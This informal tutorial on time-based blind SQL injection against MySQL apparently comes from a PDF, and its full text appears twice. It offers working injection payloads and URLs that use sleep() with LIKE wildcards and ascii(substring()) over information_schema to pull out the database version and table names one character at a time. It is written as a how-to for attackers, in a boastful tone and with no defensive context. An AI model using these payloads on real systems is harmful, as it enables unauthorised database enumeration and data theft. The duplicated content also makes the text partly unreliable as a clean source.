fast Blind SQL injection exploitation
Here is the faster method for Time based blind SQL Injection
its not just a tut , its an article with explanation . if you believe in
'CTRL+c, CTRL+v' leave from here immediately :P
so lets grab the version first by using wild card charecters
payload is
and (select sleep(10) from dual where version() like 'number.number%')--+
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
version() like 'number.number%')--+
here number.number is the number in sql server version
like my sql server version is 5.5.8
lets assume i dont know the version of SQL server :P
how to find it ?? simple
using like and wild card will own the SHIT :D
payload that we have to use should be like this
like 'number%'
means
we have to place a number and check the response of server
if number is correct, SQL server will sleep and you will get late response else
page will load withour delay
like , my sql server version is 5.5.8
so i will guess first charecter of sql server version like this
like '5%' (for sql server version 5)
and injected URL will be like this
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
version() like '5%')--+
or
like '4%' (for sql server version 4)
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
version() like '4%')--+
according to above payloads, check the first charecter in sql server version
whether it is 5 or 4
if sql server version is 5.x.x , first payload will work
if sql server version is 4.x.x , second payload will work
after successful guessing of first charecter, we need to guess next charecter
for that, place . and then number from 0 to 9
means,
like '5.1%'
like '5.2%'
like '5.3%'
like '5.4%'
like '5.5%'
like '5.6%'
like '5.7%'
like '5.8%'
start placing payloads , if version next charecter maatchs, page will respond
late
as my sql server version is 5.5.8 , so when i will place like '5.5%' in payload
, page will load respond late
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
Page 1
fast Blind SQL injection exploitation
version() like '5.1%')--+
this will result in quick page load , because SQL server version is 5.5.8 and
according to payload we are chacking whether first 3 charecters are 5.1 or not
this payload will work because we are checking whether starting 3 charecters are
5.5 are not(SQL server version is 5.5.8)
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
version() like '5.5%')--+
so , now guess next charecter. try to figure out whether next charecter is . or
some number
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
version() like '5.5.%')--+
if the above URL responde late, it means starting 4 charecters are 5.5.
else place any number instead of . on forth number
like '5.50%'
like '5.51%'
like '5.52%'
like '5.53%'
like '5.54%'
like '5.55%'
like '5.56%'
like '5.57%'
like '5.58%'
so you can find out correct version of SQL server using this approach
now next to find out table names from database >:D<
i am gonna use payload which will work by checking dec value of table name
charecters
means if there is a table having name admin, it has 5 charecters and
first charecter is a whose dec value is 97
second charecter is d whose dec value is 100
third charecter is m whose dec value is 109
forth charecter is i whose dec value is 105
fifth charecter is n whose dec value is 110
and (select sleep(10) from dual where ascii(substring((SELECT table_name from
information_schema.tables where table_schema=database() limit
0,1),1,1))</>/=dec_value)--+
lets break this payload into parts and see what actually it is doing :P
query which finds the "name of first table" in current database
SELECT table_name from information_schema.tables where table_schema=database()
limit 0,1
for finding next table name keep changing limit clause value from 0,1 to 1,1(for
2nd table) 2,1(for third table) 3,1(for forth table) and so on
finding dec value of specific charecter of table name
ascii(substring((SELECT table_name from information_schema.tables where
table_schema=database() limit 0,1),1,1)))
this is like
substring((query to find table name),1,1))
working of this payload actually is , find the table name and then select
particular charecter from it
means, suppose first table in database is admin, which is returned by query
SELECT table_name from information_schema.tables where table_schema=database()
limit 0,1
now substring function will ask to grab the charecter romthat name like
Page 2
fast Blind SQL injection exploitation
substring((query to find table name),1,1))
in above example substring is retriving first charecter of the table name which
is returned by query SELECT table_name from information_schema.tables where
table_schema=database() limit 0,1
change value from 1,1 to 2,1 for grabbing next charecter of table name and so
on :)
Here is the faster method for Time based blind SQL Injection
its not just a tut , its an article with explanation . if you believe in
'CTRL+c, CTRL+v' leave from here immediately :P
so lets grab the version first by using wild card charecters
payload is
and (select sleep(10) from dual where version() like 'number.number%')--+
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
version() like 'number.number%')--+
here number.number is the number in sql server version
like my sql server version is 5.5.8
lets assume i dont know the version of SQL server :P
how to find it ?? simple
using like and wild card will own the SHIT :D
payload that we have to use should be like this
like 'number%'
means
we have to place a number and check the response of server
if number is correct, SQL server will sleep and you will get late response else
page will load withour delay
like , my sql server version is 5.5.8
so i will guess first charecter of sql server version like this
like '5%' (for sql server version 5)
and injected URL will be like this
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
version() like '5%')--+
or
like '4%' (for sql server version 4)
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
version() like '4%')--+
according to above payloads, check the first charecter in sql server version
whether it is 5 or 4
if sql server version is 5.x.x , first payload will work
if sql server version is 4.x.x , second payload will work
after successful guessing of first charecter, we need to guess next charecter
for that, place . and then number from 0 to 9
means,
like '5.1%'
like '5.2%'
like '5.3%'
like '5.4%'
like '5.5%'
like '5.6%'
like '5.7%'
like '5.8%'
start placing payloads , if version next charecter maatchs, page will respond
late
as my sql server version is 5.5.8 , so when i will place like '5.5%' in payload
, page will load respond late
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
Page 1
fast Blind SQL injection exploitation
version() like '5.1%')--+
this will result in quick page load , because SQL server version is 5.5.8 and
according to payload we are chacking whether first 3 charecters are 5.1 or not
this payload will work because we are checking whether starting 3 charecters are
5.5 are not(SQL server version is 5.5.8)
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
version() like '5.5%')--+
so , now guess next charecter. try to figure out whether next charecter is . or
some number
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where
version() like '5.5.%')--+
if the above URL responde late, it means starting 4 charecters are 5.5.
else place any number instead of . on forth number
like '5.50%'
like '5.51%'
like '5.52%'
like '5.53%'
like '5.54%'
like '5.55%'
like '5.56%'
like '5.57%'
like '5.58%'
so you can find out correct version of SQL server using this approach
now next to find out table names from database >:D<
i am gonna use payload which will work by checking dec value of table name
charecters
means if there is a table having name admin, it has 5 charecters and
first charecter is a whose dec value is 97
second charecter is d whose dec value is 100
third charecter is m whose dec value is 109
forth charecter is i whose dec value is 105
fifth charecter is n whose dec value is 110
and (select sleep(10) from dual where ascii(substring((SELECT table_name from
information_schema.tables where table_schema=database() limit
0,1),1,1))</>/=dec_value)--+
lets break this payload into parts and see what actually it is doing :P
query which finds the "name of first table" in current database
SELECT table_name from information_schema.tables where table_schema=database()
limit 0,1
for finding next table name keep changing limit clause value from 0,1 to 1,1(for
2nd table) 2,1(for third table) 3,1(for forth table) and so on
finding dec value of specific charecter of table name
ascii(substring((SELECT table_name from information_schema.tables where
table_schema=database() limit 0,1),1,1)))
this is like
substring((query to find table name),1,1))
working of this payload actually is , find the table name and then select
particular charecter from it
means, suppose first table in database is admin, which is returned by query
SELECT table_name from information_schema.tables where table_schema=database()
limit 0,1
now substring function will ask to grab the charecter romthat name like
Page 2
fast Blind SQL injection exploitation
substring((query to find table name),1,1))
in above example substring is retriving first charecter of the table name which
is returned by query SELECT table_name from information_schema.tables where
table_schema=database() limit 0,1
change value from 1,1 to 2,1 for grabbing next charecter of table name and so
on :)
